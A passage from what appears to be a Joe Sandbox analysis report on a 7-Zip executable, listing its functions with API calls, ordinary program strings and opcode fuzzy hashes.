                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearCurrentFreeProcessVariantVirtualmemmove
                              • String ID: $ $ $ | $ (Cmplx)$1T CPU Freq (MHz):$@$AES128$AES192$Avg:$Avr:$Benchmark threads: $CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems$usage:
                              • API String ID: 362377386-3040484101
                              • Opcode ID: 07e36092ce60e61bb6fe2e040f326c49f63224b88f446fd451f27cbac585813f
                              • Instruction ID: 1ecd471a3962e28e398db64240fbf37695333367ff9e062cbe1df27ad31da7c0
                              • Opcode Fuzzy Hash: 07e36092ce60e61bb6fe2e040f326c49f63224b88f446fd451f27cbac585813f
                              • Instruction Fuzzy Hash: 6A439F32609AC186DB70EB25E8947EEB361F7C5B90F808126DA8E57B19DF3CC545EB01
                              Function 00FA541C Relevance: 216.0, APIs: 142, Strings: 1, Instructions: 1535stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearVariantmemsetstrlen
                              • String ID: Pzm
                              • API String ID: 1009013457-3550483149
                              • Opcode ID: 8864f3aac6f959e1ab29a61e8ba5e8cc0584cecd3a97f87daf6482e7cc123f0a
                              • Instruction ID: 79a92b5e57c3740e54640c52be379ee943255dbcc3392570b20a4d3e0001d43f
                              • Opcode Fuzzy Hash: 8864f3aac6f959e1ab29a61e8ba5e8cc0584cecd3a97f87daf6482e7cc123f0a
                              • Instruction Fuzzy Hash: C8D2E6B3609AC586CB70EB25E8512AEB761F7C6F90F444116DA8E87B18DF3CC855EB01
                              Function 00FC469D Relevance: 199.1, APIs: 102, Strings: 11, Instructions: 1325COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$ErrorExceptionLastThrowfflushfputcmalloc
                              • String ID: : $ is not a file$----------$Archives$Can't allocate required memory$ERROR: $Listing archive: $Path$Total archives size$Volumes$opening :
                              • API String ID: 3292964186-2093788487
                              • Opcode ID: dcd182cc3e90315acf256ebf76f32233492c38784ec00441f68537fbd4c243e1
                              • Instruction ID: 634f7fdfdc9e2bb0736a6e2d13eee6e6817eafff0b1be2505f59c18ff934333f
                              • Opcode Fuzzy Hash: dcd182cc3e90315acf256ebf76f32233492c38784ec00441f68537fbd4c243e1
                              • Instruction Fuzzy Hash: 89C2C522609BC682DB70EB25E9517AEB361F7C5B90F844026DA8D47F29DF3CC595EB00
                              Function 00FA3BBC Relevance: 187.4, APIs: 123, Strings: 1, Instructions: 1374COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$memmove$malloc
                              • String ID: Pzm
                              • API String ID: 273084669-3550483149
                              • Opcode ID: 05e4c3a31dbda257ab4ab99a1c73bbe938bffb6ad3fbaef4df3181674974808e
                              • Instruction ID: 7ac308fc1cb4fdaa0ec47cec12a193d52ea421e1bf9385cbaafa1404dd257c53
                              • Opcode Fuzzy Hash: 05e4c3a31dbda257ab4ab99a1c73bbe938bffb6ad3fbaef4df3181674974808e
                              • Instruction Fuzzy Hash: DEC27F72605B8582CB64EF25E8507AEB760FBC6F90F448512EA8E4BB15CF7DC845EB01
                              Function 00FB65F0 Relevance: 168.3, APIs: 90, Strings: 5, Instructions: 2031COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow
                              • String ID: There are unclosed input file:$bzip2$cannot open SFX module$cannot open file$update operations are not supported for this archive
                              • API String ID: 432778473-1171776569
                              • Opcode ID: 49ee7f5bc14479213eba1a65d206d5d6bc9ac5c870033aa7d1348e87376dea83
                              • Instruction ID: 662c24d9829d878e70825118b8c04f8f45ec86bd22f78e5fdf3a58b772c961f5
                              • Opcode Fuzzy Hash: 49ee7f5bc14479213eba1a65d206d5d6bc9ac5c870033aa7d1348e87376dea83
                              • Instruction Fuzzy Hash: 8B036F36709B8586CB64EF26E8942AEB764F7C5F90F588116DA8E47B18CF3CC855DB00
                              Function 00FAF022 Relevance: 126.9, APIs: 83, Strings: 1, Instructions: 903COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$memset$ExceptionThrow
                              • String ID: Split
                              • API String ID: 2395193269-1882502421
                              • Opcode ID: 2493290eb5b3f8ee24db4eda8cd518f2314f742f85cb72dacdc63952338f8260
                              • Instruction ID: fdbd6b97e033a35dcd990db7ba9f26109d64f5d5d75124fd98e9afeeae07edb4
                              • Opcode Fuzzy Hash: 2493290eb5b3f8ee24db4eda8cd518f2314f742f85cb72dacdc63952338f8260
                              • Instruction Fuzzy Hash: 41729476609BC586CBA4EB26E85066F7760F7C6B84F505022EE4E4BB15CF3DC859DB00
                              Function 00F831C8 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 312COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: Cannot open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                              • API String ID: 1534225298-1557438135
                              • Opcode ID: 32373e873a27a7a34b06568e3a1b51652a750d874ec9e573c91551283f754d21
                              • Instruction ID: a4a95a1ffc984a0bb1c82775b0a9114a81181a2aec086c2fdf1c38588c3eb963
                              • Opcode Fuzzy Hash: 32373e873a27a7a34b06568e3a1b51652a750d874ec9e573c91551283f754d21
                              • Instruction Fuzzy Hash: 04C15132204A8692CB60EB51EC917AEB372F7C1B90F504423EA8E47B64DF3DC955EB11
                              Function 00FA1984 Relevance: 60.5, APIs: 36, Strings: 4, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
                              • API String ID: 1294909896-4104380264
                              • Opcode ID: 956a6dc816dc0f88712ccad567c0052a682e0abf729c03b5f6a23e86dca17487
                              • Instruction ID: 6bac415dddd2eb0aae01f968ec240fad23dbc023586b3956583884d48ca7a648
                              • Opcode Fuzzy Hash: 956a6dc816dc0f88712ccad567c0052a682e0abf729c03b5f6a23e86dca17487
                              • Instruction Fuzzy Hash: D802B6637096C582DBA0DB25E8903AE7761F7C6780F509022EB8E47B29DF3DC856E711
                              Function 00F92F00 Relevance: 56.7, APIs: 37, Instructions: 1174COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: df26cbb64e52e9273ecb84fd93c97316ebf98eec34a8463178a40bc2d0f7f725
                              • Instruction ID: 88ba4676029387f14f97032cea9951b887ce29248c5aa0cc9a17f890756eb576
                              • Opcode Fuzzy Hash: df26cbb64e52e9273ecb84fd93c97316ebf98eec34a8463178a40bc2d0f7f725
                              • Instruction Fuzzy Hash: 68A2CE36719A8582EF24DF25E8507AEB361FBC5B98F444026DA4E47B28DF3DC949E700
                              Function 00FC6550 Relevance: 52.7, APIs: 14, Strings: 16, Instructions: 155libraryloadertimeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Processfputs$AddressCurrentProc$HandleLibraryLoadModuleTimesmemset
                              • String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                              • API String ID: 2354542715-74044351
                              • Opcode ID: 08fd7e1f0e543b090c1fdc8a842d68e237c6065c0f3236f1413357f278ce83de
                              • Instruction ID: 91e67245ce1978681616c36830a15d5ab506c3080267810258d3aa2e490e6d8d
                              • Opcode Fuzzy Hash: 08fd7e1f0e543b090c1fdc8a842d68e237c6065c0f3236f1413357f278ce83de
                              • Instruction Fuzzy Hash: 1F614E61705A8782EE30DB56E955BBA7362FB88BD0F44403ADD4E87B64EE7CC449E700
                              Function 00FC328C Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 492stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$memset$strlen$memmove
                              • String ID: data:
                              • API String ID: 527563900-3222861102
                              • Opcode ID: 9a76d5dd416d0487b7c1d14dc4bcf4a788695f1eea2e26c5366d7eb632d94cc0
                              • Instruction ID: 4c61c9a34434bcbbbc90a15837af28d1324ad2c387d0cc5156633093ce18d365
                              • Opcode Fuzzy Hash: 9a76d5dd416d0487b7c1d14dc4bcf4a788695f1eea2e26c5366d7eb632d94cc0
                              • Instruction Fuzzy Hash: 661237336046C386DB60DF25E981BAEB761F790BD4F44902AEB8A47A55DF3CC945EB00
                              Function 00F91288 Relevance: 28.2, APIs: 22, Instructions: 662COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 25136c1800815f7c234901d955ec7c49db965cce6217b761b30d1ac2caf1d6d5
                              • Instruction ID: 1b006099607836faa893b6cfe604317d5047d9acac67ef6b78764ca1644780e4
                              • Opcode Fuzzy Hash: 25136c1800815f7c234901d955ec7c49db965cce6217b761b30d1ac2caf1d6d5
                              • Instruction Fuzzy Hash: E0427E32705A8685EF25EF26E8507AAB361FBC5B84F548126DE4E47B18DF3DC849E700
                              Function 00FBF1EC Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 560timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Duplicate filename on disk:, xrefs: 00FBF47E
                              • Duplicate filename in archive:, xrefs: 00FBFA11
                              • Internal file name collision (file on disk, file in archive):, xrefs: 00FBFA25
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$CompareFileTimemallocmemset
                              • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                              • API String ID: 1338569196-819937569
                              • Opcode ID: 2fc85414e7cab6a947b45a23e969bcc9298f246327c85903a986e9058c03029a
                              • Instruction ID: f797f45f17dabeda7e7032a72612dee6fe87bc0c90651ecedb7b43f2881c2e6c
                              • Opcode Fuzzy Hash: 2fc85414e7cab6a947b45a23e969bcc9298f246327c85903a986e9058c03029a
                              • Instruction Fuzzy Hash: A822B47761468486CB30DF2AE8502AEB7A1F3857A4F144226EB9E97B64DF3CD845DF00
                              Function 00F77DE8 Relevance: 16.4, APIs: 13, Instructions: 156COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLast
                              • String ID:
                              • API String ID: 408039514-0
                              • Opcode ID: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                              • Instruction ID: 9957e2a7397745db4fa12df1edc7a9abe98302c02e9e37fa3a244375d2a54786
                              • Opcode Fuzzy Hash: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                              • Instruction Fuzzy Hash: 7751C822128A4592DB50FF24E85176EB720EBC57E0F809123FB8E43675DF6DC946EB12
                              Function 00F79414 Relevance: 10.6, APIs: 7, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$DriveLogicalStrings
                              • String ID:
                              • API String ID: 837055893-0
                              • Opcode ID: 4cc479028ff7d879fdc195de33e9bcb2252e8f84ad214416d340dcefb7a8def0
                              • Instruction ID: 9fa6f8d625770444cfcd78efbd9052cfb52bb34e7ace874d703ac9f6bb50c248
                              • Opcode Fuzzy Hash: 4cc479028ff7d879fdc195de33e9bcb2252e8f84ad214416d340dcefb7a8def0
                              • Instruction Fuzzy Hash: 3D310363705B4156CB61EF22A85036E6351E784BE8F4CC226AE5E4B384EF7CC942A301
                              Function 00F7A720 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00F7A745
                              • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 00F7A79C
                              • DeviceIoControl.KERNEL32 ref: 00F7A7E5
                              • free.MSVCRT ref: 00F7A7F2
                              • free.MSVCRT ref: 00F7A80F
                              • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 00F7A83D
                              • free.MSVCRT ref: 00F7A846
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ControlDeviceFileHandleInformationmemmove
                              • String ID:
                              • API String ID: 2572579059-0
                              • Opcode ID: 52e7afdefa4f23aef127d3b64a9db95593860de566cbb6a06265da25cc2ed072
                              • Instruction ID: b196709f1f82191baf03e38ff8d8422ac753579d883c47a1791c00df016739d5
                              • Opcode Fuzzy Hash: 52e7afdefa4f23aef127d3b64a9db95593860de566cbb6a06265da25cc2ed072
                              • Instruction Fuzzy Hash: 1D31A432605A4189C7709F11F84076EB764E3C1BE0F598226EBEE4BB94DE3DC492D702
                              Function 00F7BC48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressDiskFreeHandleModuleProcSpace
                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                              • API String ID: 1197914913-1127948838
                              • Opcode ID: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                              • Instruction ID: 00620ef21c585439b7a8e0d0dd13f903f5bc4d45916ff198237b5a9b57fb82c7
                              • Opcode Fuzzy Hash: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                              • Instruction Fuzzy Hash: AE115C33616B4A95DA61CF55F480BAAB364F795B81F449022EB8D47B28EF38C559C700
                              Function 00FCDEA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcVersion
                              • String ID: SetDefaultDllDirectories$kernel32.dll
                              • API String ID: 3310240892-2102062458
                              • Opcode ID: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                              • Instruction ID: 36cf8887adf129b89056a63d5ae6d258f0a0793381edd327fa6ef958ebd735c2
                              • Opcode Fuzzy Hash: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                              • Instruction Fuzzy Hash: E1E01724A86507C1FA28ABA5FC997382323AB94702FC4013BC40A06B60EF2C858AE301
                              Function 00F7C204 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212timeCOMMON
                              Download Yara Rule
                              APIs
                              • FileTimeToLocalFileTime.KERNEL32 ref: 00F7C220
                              • FileTimeToSystemTime.KERNEL32 ref: 00F7C234
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Time$File$LocalSystem
                              • String ID: gfff
                              • API String ID: 1748579591-1553575800
                              • Opcode ID: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                              • Instruction ID: 6d9d5a4a7339eaeae79f1cb8095904cd8c39690ef73516c8410facf261749968
                              • Opcode Fuzzy Hash: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                              • Instruction Fuzzy Hash: AB616753F086C04BE31ACB3D98667DE6FC1D3A5704F08C229DF9587B85E66C850AD762
                              Function 00F7C7DC Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F7C7B4: GetCurrentProcess.KERNEL32 ref: 00F7C7BE
                              • GetSystemInfo.KERNEL32 ref: 00F7C820
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CurrentInfoProcessSystem
                              • String ID:
                              • API String ID: 1098911721-0
                              • Opcode ID: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                              • Instruction ID: d84aae8253f62381ad1e1e16a176d7d009483409a4ad5322af25e4e194ec73bc
                              • Opcode Fuzzy Hash: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                              • Instruction Fuzzy Hash: 7AE0D8A3A2445083CB70DB08E841769B360F794B95FC0D21BE98E82F14DF2DC645DF82
                              Function 00F8E8E0 Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
